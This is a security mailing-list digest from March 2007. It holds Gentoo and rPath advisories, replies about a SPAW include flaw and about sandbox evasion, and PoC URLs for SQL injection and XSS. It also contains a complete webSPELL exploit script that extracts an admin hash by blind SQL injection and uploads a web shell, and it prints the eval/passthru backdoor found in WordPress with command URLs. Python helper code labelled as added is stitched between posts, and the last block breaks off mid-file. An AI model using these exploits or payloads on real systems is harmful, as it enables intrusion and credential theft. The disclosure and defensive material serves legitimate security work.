Re: SPAW Editor PHP Edition

2007-03-03 Thread Steve Watt
In article <[EMAIL PROTECTED]>,
RaeD Hasadya <[EMAIL PROTECTED]> wrote:
>Remote Include File : SPAW Editor PHP Edition upgrade version 1.2.3 to 1.2.4
>
>Discovered By : Hasadya Raed
>Contact Me : RaeD[at]BsdMail[dot]Com
>Download Script:
>http://heanet.dl.sourceforge.net/sourceforge/spaw/spaw-php-123-to-124.zip 
>
>B.File :img_library.php :
>include $spaw_root.'class/util.class.php'; 
>include $spaw_root.'class/lang.class.php'; 
>
>=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
>
>Expl:-http://www.victim.com/spaw/dialogs/img_library.php?spaw_root=[Shell-AttacK]

Besides being for an older version, this is only a problem if
you haven't correctly installed the package (i.e. created the
spaw_control.config.php file that defines spaw_root).

This advisory is about >< that close to being purely bogus.

(I don't even use spaw, I just had to go peek.)
-- 
Steve Watt KD6GGD  PP-ASEL-IA  ICBM: 121W 56' 57.5" / 37N 20' 15.3"
 Internet: steve @ Watt.COM  Whois: SW32-ARIN
   Free time?  There's no such thing.  It just comes in varying prices...


[ GLSA 200703-05 ] Mozilla Suite: Multiple vulnerabilities

2007-03-03 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200703-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Mozilla Suite: Multiple vulnerabilities
      Date: March 03, 2007
      Bugs: #135257
        ID: 200703-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Several vulnerabilities exist in the Mozilla Suite, which is no longer
supported by the Mozilla project.

Background
==========

The Mozilla Suite is a popular all-in-one web browser that includes a
mail and news reader.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  www-client/mozilla              <= 1.7.13              Vulnerable!
  2  www-client/mozilla-bin          <= 1.7.13              Vulnerable!
    -------------------------------------------------------------------
     NOTE: Certain packages are still vulnerable. Users should migrate
           to another package if one is available or wait for the
           existing packages to be marked stable by their
           architecture maintainers.
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Several vulnerabilities ranging from code execution with elevated
privileges to information leaks affect the Mozilla Suite.

Impact
======

A remote attacker could entice a user to browse to a specially crafted
website or open a specially crafted mail that could trigger some of the
vulnerabilities, potentially allowing execution of arbitrary code,
denials of service, information leaks, or cross-site scripting attacks
leading to the robbery of cookies or authentication credentials.

Workaround
==========

Most of the issues, but not all of them, can be prevented by disabling
the HTML rendering in the mail client and JavaScript on every
application.

Resolution
==========

The Mozilla Suite is no longer supported and has been masked after some
necessary changes on all the other ebuilds which used to depend on it.
Mozilla Suite users should unmerge www-client/mozilla or
www-client/mozilla-bin, and switch to a supported product, like
SeaMonkey, Thunderbird or Firefox.


# emerge --unmerge "www-client/mozilla"

# emerge --unmerge "www-client/mozilla-bin"

References
==========

  [ 1 ] Official Advisory

http://www.mozilla.org/projects/security/known-vulnerabilities.html#Mozilla

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




ERRATA: [ GLSA 200703-01 ] Snort: Remote execution of arbitrary code

2007-03-03 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [ERRATA UPDATE]          GLSA 200703-01:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Snort: Remote execution of arbitrary code
      Date: February 23, 2007
   Updated: March 02, 2007
      Bugs: #167730
        ID: 200703-01:02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Errata
======

The initial workaround provided by the GLSA does not avoid the mentioned
vulnerability.

The corrected section appears below.

Workaround
==========

Disable the DCE/RPC processor by commenting the 'preprocessor dcerpc'
section in /etc/snort/snort.conf .

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
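The corrected workaround is a configuration edit, and the detail that bites in practice is that a Snort preprocessor directive continues across every line that ends in a backslash, so commenting out only the first 'preprocessor dcerpc' line leaves the continuation lines behind as syntax errors. The helper below is an added example, not part of the Gentoo advisory: it comments out the whole stanza, is safe to run twice, and reports which preprocessors remain active. The snort.conf fragment is constructed, and the names disable_dcerpc and active_preprocessors are chosen here.

```python
"""Comment out the whole 'preprocessor dcerpc' stanza of a snort.conf.

Added example (not from the GLSA); the config fragment below is constructed.
"""
import re

# Constructed snort.conf fragment. Preprocessor directives may span several
# lines joined by a trailing backslash, so the whole stanza has to go.
SAMPLE_SNORT_CONF = """\
preprocessor frag3_global
preprocessor frag3_engine: policy first
preprocessor dcerpc: \\
    autodetect \\
    max_frag_size 3000 \\
    memcap 100000
preprocessor http_inspect: global \\
    iis_unicode_map unicode.map 1252
output alert_fast: snort.alert
"""

DIRECTIVE = re.compile(r"^\s*preprocessor\s+dcerpc\b")


def disable_dcerpc(conf_text):
    """Return (new_text, number_of_lines_commented).

    Every line of a 'preprocessor dcerpc' directive, including continuation
    lines ending in a backslash, is prefixed with '# '. Lines that are
    already commented do not match DIRECTIVE, so a second run changes nothing.
    """
    out = []
    count = 0
    in_stanza = False
    for line in conf_text.splitlines(keepends=True):
        if not in_stanza and DIRECTIVE.match(line):
            in_stanza = True
        if in_stanza:
            out.append("# " + line)
            count += 1
            # A trailing backslash means the directive continues on the next line.
            in_stanza = line.rstrip("\r\n").rstrip().endswith("\\")
        else:
            out.append(line)
    return "".join(out), count


def active_preprocessors(conf_text):
    """List the names of preprocessors that are still enabled (not commented out)."""
    names = []
    for line in conf_text.splitlines():
        m = re.match(r"^\s*preprocessor\s+([A-Za-z0-9_]+)", line)
        if m:
            names.append(m.group(1))
    return names


if __name__ == "__main__":
    new_conf, n = disable_dcerpc(SAMPLE_SNORT_CONF)
    print(new_conf)
    print("commented %d line(s); still active: %s" % (n, active_preprocessors(new_conf)))
```

Run it against a copy of /etc/snort/snort.conf and diff the result before replacing the file; active_preprocessors() is a quick confirmation that only dcerpc dropped out and that no continuation line was left dangling.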




Re: Xbox 360 Hypervisor Privilege Escalation Vulnerability

2007-03-03 Thread ron . kleinman
We have discovered a vulnerability in the Xbox 360 hypervisor that allows 
privilege escalation into hypervisor mode. Together with a method to inject 
data into non-privileged memory areas, this vulnerability allows an attacker 
with physical access to an Xbox 360 to run arbitrary code such as alternative 
operating systems with full privileges and full hardware access.

Great Scott ... no wonder Microsoft is terrified!  Do you realize what this 
means??  It means Solaris 10 on the XBox 360 ... a dream come true!!  :-)


Re: VMware Workstation multiple denial of service and isolation manipulation vulnerabilities

2007-03-03 Thread emptysands
This problem seems to occur on vmware server/Linux as well. 

I've discovered this issue with in W2k3 Terminal Server with a "Domain User" 
being able to "unplug" the network device.


[Fwd: Re: Angel LMS 7.1 - Remote SQL Injection]

2007-03-03 Thread don bailey


--- Begin Message ---



http://www.milw0rm.com/exploits/3390

Plagiarism sucks.


So does altering source code before you post it on your website.

http://kernelspace.us/itheft.c
http://www.milw0rm.com/exploits/3383


--- End Message ---


rPSA-2007-0040-3 firefox thunderbird

2007-03-03 Thread rPath Update Announcements
rPath Security Advisory: 2007-0040-3
Published: 2007-02-26
Updated:
2007-02-26 Correctly formatted CVE URLs
2007-03-03 Added newly-released thunderbird packages to advisory
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
firefox=/[EMAIL PROTECTED]:devel//1/1.5.0.10-0.1-1
thunderbird=/[EMAIL PROTECTED]:devel//1/1.5.0.10-0.1-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995
https://issues.rpath.com/browse/RPL-1081
https://issues.rpath.com/browse/RPL-1103

Description:
Previous versions of the firefox package are vulnerable to several
types of attacks, some of which are understood to allow compromised
or malicious sites to run arbitrary code as the user running the
firefox browser.

2 March 2007 Update: The vulnerabilities previously resolved in the
firefox package have now been resolved in the thunderbird package as well.


Re: Evading the Norman SandBox Analyzer

2007-03-03 Thread John Smith
This is the same as the results found > 2 years ago as published by  
Joanna Rutkowska as RedPill (http://invisiblethings.org/papers/ 
redpill.html) (and before that in a Usenix paper) and therefore  
everyone who is interested in emulated/virtualized security already  
knows that SIDT is a problem instruction.


John
On Feb 28, 2007, at 11:36 AM, Arne Vidstrom wrote:


Hi all,

Summary:

The Norman SandBox Analyzer (http://sandbox.norman.no/live.html)  
runs malicious code samples in an emulated environment while  
logging their actions. In practice it is more or less impossible to  
make an emulated environment perfectly similar to the real thing.  
It is therefore possible to write malicious code that does not  
behave maliciously when run in the Sandbox Analyzer. Here I will  
give one example of such a technique.


Full text at:

http://www.ntsecurity.nu/onmymind/2007/2007-02-27.html

I have notified Norman about the problem but have chosen not to  
wait for them to patch it. The reason being that this is not a  
regular vulnerability, but rather an example of an inherent  
weakness in emulated sandboxes in general. I assume they will patch  
this particular case shortly though since it should be very easy to  
do.


Regards /Arne

http://ntsecurity.nu
http://vidstrom.net




Re: Evading the Norman SandBox Analyzer

2007-03-03 Thread Arne Vidstrom

Hi,

Yes, the same instruction is used, but no, this is not the same thing at 
all. In the SandBox Analyzer case the problem is that the limit is set 
to a value which is not according to the Intel specification, which in 
turn singles out the SandBox Analyzer.


The RedPill technique works because in the virtualization the SIDT 
instruction is emulated in ring 0 but run straight on the processor in 
ring 3. Therefore SIDT in ring 3 reveals the address of another IDT than 
the one the OS thinks is in use. In a true emulator there is no reason 
why the SIDT instruction should give different results in ring 0 and 
ring 3, because everything is emulated both in ring 0 and ring 3. And 
especially there is no reason why the limit should be for example 800h 
instead of 7ffh. That is not a problem with the emulator in itself, but 
a problem with the "OS" running inside the emulator. Which, again, is 
not the same problem as the one RedPill uses. So no, this has not 
already been published > 2 years ago.


/Arne

John Smith skrev:
This is the same as the results found > 2 years ago as published by 
Joanna Rutkowska as RedPill 
(http://invisiblethings.org/papers/redpill.html) (and before that in a 
Usenix paper) and therefore everyone who is interested in 
emulated/virtualized security already knows that SIDT is a problem 
instruction.


John
On Feb 28, 2007, at 11:36 AM, Arne Vidstrom wrote:


Hi all,

Summary:

The Norman SandBox Analyzer (http://sandbox.norman.no/live.html) runs 
malicious code samples in an emulated environment while logging their 
actions. In practice it is more or less impossible to make an 
emulated environment perfectly similar to the real thing. It is 
therefore possible to write malicious code that does not behave 
maliciously when run in the Sandbox Analyzer. Here I will give one 
example of such a technique.


Full text at:

http://www.ntsecurity.nu/onmymind/2007/2007-02-27.html

I have notified Norman about the problem but have chosen not to wait 
for them to patch it. The reason being that this is not a regular 
vulnerability, but rather an example of an inherent weakness in 
emulated sandboxes in general. I assume they will patch this 
particular case shortly though since it should be very easy to do.


Regards /Arne

http://ntsecurity.nu
http://vidstrom.net





BJ Webring XSS

2007-03-03 Thread sn0oPy . team
* BJ Webring XSS

* By : sn0oPy

* Risk : high


 
* exploit :

just inject any script on the add link menu : 
http://www.target.ma/webring/formulaire.php

Dork :

intitle:".: index webring :."


* contact : [EMAIL PROTECTED]

* greetz : [subzero], http://forums.avenir-geopolitique.net.

reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2707


Tyger Bug Tracking System Multiple Vulnerability

2007-03-03 Thread corrado . liotta
-=[ADVISORY---]=-

Tyger Bug Tracking System

Author: CorryL [EMAIL PROTECTED]
-=[---]=-


-=[+] Application:    Tyger Bug Tracking System
-=[+] Version:        1.1.3
-=[+] Vendor's URL:   http://uk.homeunix.org/tyger/cms/
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Cross-Site Script\Sql injection
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:         CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:      www.xoned.net
-=[+] Virtual Office: http://www.kasamba.com/CorryL
-=[+] Irc Chan:       irc.darksin.net #x0n3-h4ck


..::[ Description ]::..

Tyger Bug tracking software has been designed and
developed for individuals or groups of software developers
to manage software development better.
By using Tyger, teams of developers are able to communicate far better
with fellow developers or end users, which ultimately improves the quality
of your software project or product.




..::[ Proof Of Concept ]::..

[Sql injection]

http://remote_server/ViewBugs.php?s=[sql]&o=ASC


[Xss]

http://remote_server/Login.php/>">[XSS]

http://remote_server/Register.php/>">[XSS]





rPSA-2007-0048-1 tcpdump

2007-03-03 Thread rPath Update Announcements
rPath Security Advisory: 2007-0048-1
Published: 2007-03-03
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Remote User Deterministic Denial of Service
Updated Versions:
tcpdump=/[EMAIL PROTECTED]:devel//1/3.9.5-0.1-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1218
https://issues.rpath.com/browse/RPL-1100

Description:
Previous versions of the tcpdump package are vulnerable to a remote
denial of service when printing 802.11 ethernet frames, only if the
link type was specified explicitly on the tcpdump command line.  No
unauthorized access is understood to be enabled by this vulnerability.


[ GLSA 200703-04 ] Mozilla Firefox: Multiple vulnerabilities

2007-03-03 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200703-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Mozilla Firefox: Multiple vulnerabilities
      Date: March 02, 2007
      Bugs: #16
        ID: 200703-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been reported in Mozilla Firefox, some of
which may allow user-assisted arbitrary remote code execution.

Background
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla
Project.

Affected packages
=================

    -------------------------------------------------------------------
     Package                        /  Vulnerable  /         Unaffected
    -------------------------------------------------------------------
  1  www-client/mozilla-firefox         < 2.0.0.2           *>= 1.5.0.10
                                                             >= 2.0.0.2
  2  www-client/mozilla-firefox-bin     < 2.0.0.2           *>= 1.5.0.10
                                                             >= 2.0.0.2
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Tom Ferris reported a heap-based buffer overflow involving wide SVG
stroke widths that affects Mozilla Firefox 2 only. Various researchers
reported some errors in the JavaScript engine potentially leading to
memory corruption. Mozilla Firefox also contains minor vulnerabilities
involving cache collision and unsafe pop-up restrictions, filtering or
CSS rendering under certain conditions.

Impact
======

An attacker could entice a user to view a specially crafted web page
that will trigger one of the vulnerabilities, possibly leading to the
execution of arbitrary code. It is also possible for an attacker to
spoof the address bar, steal information through cache collision,
bypass the local files protection mechanism with pop-ups, or perform
cross-site scripting attacks, leading to the exposure of sensitive
information, like user credentials.

Workaround
==========

There is no known workaround at this time for all of these issues, but
most of them can be avoided by disabling JavaScript.

Resolution
==========

Users upgrading to the following releases of Mozilla Firefox should
note that this upgrade has been found to lose the saved passwords file
in some cases. The saved passwords are encrypted and stored in the
'signons.txt' file of ~/.mozilla/ and we advise our users to save that
file before performing the upgrade.

All Mozilla Firefox 1.5 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-1.5.0.10"

All Mozilla Firefox 1.5 binary users should upgrade to the latest
version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-1.5.0.10"

All Mozilla Firefox 2.0 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-2.0.0.2"

All Mozilla Firefox 2.0 binary users should upgrade to the latest
version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-2.0.0.2"

References
==========

  [ 1 ] CVE-2006-6077
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077
  [ 2 ] CVE-2007-0775
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775
  [ 3 ] CVE-2007-0776
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776
  [ 4 ] CVE-2007-0777
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777
  [ 5 ] CVE-2007-0778
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778
  [ 6 ] CVE-2007-0779
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779
  [ 7 ] CVE-2007-0780
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780
  [ 8 ] CVE-2007-0800
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800
  [ 9 ] CVE-2007-0801
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0801
  [ 10 ] CVE-2007-0981
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981
  [ 11 ] CVE-2007-0995
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995
  [ 12 ] Mozilla password loss bug
 https://bugzilla.mozilla.org/show_bug.cgi?id=360493#c366

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux a

webSPELL <= 4.01.02 Remote PHP Code Execution Exploit

2007-03-03 Thread gmdarkfig
#!/usr/bin/php
<?php
# http://localhost/webspell4.01.02/downloads/c99shell.php)
#
if($argc < 5)
{
print ("
--   webSPELL <= 4.01.02 Remote PHP Code Execution Exploit   --
---
PHP conditions: register_globals=On
   Credits: DarkFig <[EMAIL PROTECTED]>
   URL: http://www.acid-root.new.fr/
---
  Usage: $argv[0] -url <> -file <> [Options]
 Params: -url   For example http://victim.com/webspell/ 
 -file  The file you wanna upload (c99shell.php...)
Options: -prefixTable prefix (default=webs)
 -upmatch   The match which returns TRUE for the upload
 -sqlmatch  The match which returns TRUE for the SQL injection
 -proxy If you wanna use a proxy  
 -proxyauth Basic authentification 
Example: $argv[0] -url http://localhost/webspell/ -file c99shell.php
---
");exit(1);
}

$url= getparam('url',1);
$file   = getparam('file',1);
$prfix  = (getparam('prefix')!='')   ? getparam('prefix')   : 'webs';
$match_upload   = (getparam('upmatch')!='')  ? getparam('upmatch')  : 
'\;URL\=index\.php\?site\=files\&file\=';
$match_blindsql = (getparam('sqlmatch')!='') ? getparam('sqlmatch') : 
'site\=profile\&id\=';
$proxy  = getparam('proxy');
$authp  = getparam('proxyauth');

$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);

print "\nAdmin id: ";
$userid = blind('userID');

print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));

print "\nLogged in (ws_auth=$userid%3A$passwd)";
$xpl->addcookie("ws_auth",$userid."%3A".$passwd);


# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
print "\nTrying to upload the malicious file";
$frmdt = array(frmdt_url => $url.'index.php?site=files&action=save',
   "fileurl" => 1,
   "upfile"  => array(frmdt_filename => basename($file),
  frmdt_content  => file_get_contents($file)));

$xpl->formdata($frmdt);
if(preg_match("#$match_upload#si",$xpl->getcontent())) print "\nDone";
else print "\nFailed";
print " (${url}downloads/".basename($file).")\n";


# Simple blind SQL injection (register_globals=On)
#
# +members.php
# |
# 31. if($_GET['action']=="show") {
# 32. if($_GET['squadID']) {
# 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"';
# 34. }
# 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER BY sort");
#
function blind($field)
{
global $prfix,$xpl,$url,$match_blindsql;
$d=0; $v='';

if(!eregi('p',$field)) { $b=47;$c=57; } # 0-9 (numeric userID)
else   { $b=47;$c=70; } # 0-9, A-F (hex digits of the password hash)

while(TRUE)
{
$d++;
for($e=$b;$e<=$c;$e++)
{
if($e==47) $f='NULL';
else $f=$e;

$sql = "WHERE SUBSTR((SELECT $field FROM ${prfix}_user WHERE userID="
      ."(SELECT userID FROM ${prfix}_user_groups WHERE files=1 LIMIT 1)"
      ." LIMIT 1),$d,1)=CHAR($f)";

$xpl->get($url."index.php?site=members&action=show&getsquad=".urlencode($sql));

if(preg_match("#$match_blindsql#",$xpl->getcontent(),$matches))
{
if($e==47)
{
return $v;
}
else
{
print strtolower(chr($f));
$v .= chr($f);
break;
}
}
}
}
}

function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
}
if($opt) exit("\n-$param parameter required");
else return;
}

if(!function_exists('file_get_contents')) {
function file_get_contents($file)
{
$handle  = fopen($file, "r");
$content = fread($handle, filesize($file));
fclose($handle);
return $content;
}
}

?>
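Both the SPAW thread earlier in this digest (a request parameter that ends up as the prefix of an include path) and this webSPELL post (a request parameter spliced into a WHERE clause and then used to pull a hash out one character at a time) leave a distinctive trace in the web server's access log. The script below is an added example written for this page, not code from either post or project: it parses combined-format log lines and flags parameter values that are remote URLs, or that carry the SUBSTR(...)=CHAR(n) probing shape the exploit above builds. The log lines and IP addresses are constructed; only the parameter names spaw_root and getsquad come from the posts, and LOG_RE, classify and scan_log are names chosen here.

```python
"""Flag remote-file-include and blind-SQL-injection probes in web access logs.

Added example for this page, not code from the SPAW or webSPELL posts.
The log lines and addresses below are constructed; only the parameter
names (spaw_root, getsquad) are taken from the posts.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx "combined" format: ip ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter whose value is an absolute URL: with register_globals and
# allow_url_fopen on, an include($var . '...') sink fetches it remotely.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)

# Match SQL structure rather than single keywords, so ordinary search
# strings containing "select" or "and" do not trip the rule.
SQLI_PATTERNS = [
    re.compile(r'\bSUBSTR(?:ING)?\s*\(\s*\(?\s*SELECT\b', re.I),   # char-by-char extraction
    re.compile(r'=\s*CHAR\s*\(\s*\d+\s*\)', re.I),                 # ...compared via CHAR(n)
    re.compile(r'\bUNION\s+(?:ALL\s+)?SELECT\b', re.I),
    re.compile(r'''['"]\s*(?:OR|AND)\s+['"]?\w+['"]?\s*=\s*['"]?\w+''', re.I),
]

# Constructed sample: one RFI probe, one blind-SQLi probe, two benign requests.
SAMPLE_LOG = """\
203.0.113.9 - - [03/Mar/2007:10:01:12 +0000] "GET /spaw/dialogs/img_library.php?spaw_root=http://198.51.100.7/x.txt HTTP/1.1" 200 3120 "-" "Mozilla/4.0"
203.0.113.9 - - [03/Mar/2007:10:02:40 +0000] "GET /index.php?site=members&action=show&getsquad=WHERE+SUBSTR%28%28SELECT+password+FROM+webs_user+LIMIT+1%29%2C1%2C1%29%3DCHAR%2849%29 HTTP/1.1" 200 8810 "-" "Mozilla Firefox"
198.51.100.22 - - [03/Mar/2007:10:03:01 +0000] "GET /index.php?site=members&action=show&squadID=3 HTTP/1.1" 200 7700 "-" "Mozilla/5.0"
198.51.100.22 - - [03/Mar/2007:10:03:05 +0000] "GET /spaw/dialogs/img_library.php?dir=images HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict of fields for one combined-format line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    split = urlsplit(rec["target"])
    rec["path"] = split.path
    # keep_blank_values so "?spaw_root=" with an empty value is still listed
    rec["params"] = parse_qsl(split.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return [(finding, parameter, decoded_value), ...] for one parsed request."""
    findings = []
    for name, raw in rec["params"]:
        # parse_qsl decoded once already; a second unquote catches double-encoding
        value = unquote(raw)
        if REMOTE_URL_RE.match(value.strip()):
            findings.append(("remote-file-include", name, value))
        if any(p.search(value) for p in SQLI_PATTERNS):
            findings.append(("sql-injection", name, value))
    return findings


def scan_log(text):
    """Return [(ip, path, finding, param, value), ...] for every suspicious request."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for finding, name, value in classify(rec):
            hits.append((rec["ip"], rec["path"], finding, name, value))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%s %s %-20s %s=%s" % hit)
```

The second unquote() is deliberate: the exploit above urlencodes its payload once, but scanners that double-encode are common, and a legitimate value that happens to contain a literal percent sign costs at worst one false positive. Values that match are worth correlating with the response size column, since a boolean-blind probe produces two distinct sizes for true and false guesses.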


WordPress source code compromised to enable remote code execution

2007-03-03 Thread ifsecure
While assessing the security of WordPress, a popular blog creation software, I 
have discovered that its source code has recently been compromised by a third 
party in order to enable remote command execution on the machines running 
affected versions. The compromised files are wp-includes/feed.php and 
wp-includes/theme.php. 
The following code has been added:


in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
   eval($filterdata);
}

...

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }


in wp-includes/theme.php

function get_theme_mcommand($mcds) {
   passthru($mcds);
}

...

if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }


This would enable remote command execution on machines running compromised 
versions, for example:

http://wordpressurl/wp-includes/feed.php?ix=phpinfo();
http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd


I discovered this vulnerability on Friday, March 2nd 2007 and contacted 
WordPress about it straight away. They reacted promptly by disabling downloads 
until further investigation. Later they determined that only one of two servers 
had been compromised and that the two files mentioned above are the only ones 
changed.

It seems that the above files were changed on Feb 25th, 2007, so if you 
downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible 
that you are running a compromised version, so be sure to check for the above 
code.


Discovered and reported by Ivan Fratric
http://ifsec.blogspot.com


Thanks to Ryan Boren of WordPress for quick response and his feedback regarding 
this issue.
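The injected code quoted above is the smallest possible web shell: a one-argument wrapper around eval() or passthru() that is fed straight from $_GET. The scanner below is an added example, not part of Ivan Fratric's report or of WordPress itself; it walks a PHP source string and flags request input reaching a code or command sink, either directly or through such a wrapper, and separately matches the two function names the report says were added. The PHP samples are constructed to mirror the quoted code, and find_backdoors and wrapper_functions are names chosen here.

```python
"""Scan PHP source for a request-input-to-sink backdoor of the kind reported above.

Added example, not part of the WordPress report or code base. The PHP
samples are constructed to mirror the quoted injection.
"""
import re

# PHP functions that execute code or shell commands.
SINKS = ("eval", "passthru", "system", "exec", "shell_exec", "popen", "proc_open", "assert")
# Function names the report says were added to feed.php and theme.php.
KNOWN_BAD_NAMES = ("comment_text_phpfilter", "get_theme_mcommand")

# function name($param) { ... }  (single-level bodies only: a nested '}' ends the match early)
FUNC_DEF_RE = re.compile(r'function\s+(\w+)\s*\(\s*(\$\w+)\s*\)\s*\{([^}]*)\}', re.S)
# name($_GET["x"]), name($_POST['x']), ...: a call fed directly from request input
CALL_RE = re.compile(r'(\w+)\s*\(\s*(\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\])\s*\)')
# sink($var): which variable a sink consumes
SINK_RE = re.compile(r'\b(' + '|'.join(SINKS) + r')\s*\(\s*(\$\w+)', re.I)

# Constructed sample mirroring the feed.php injection quoted in the report.
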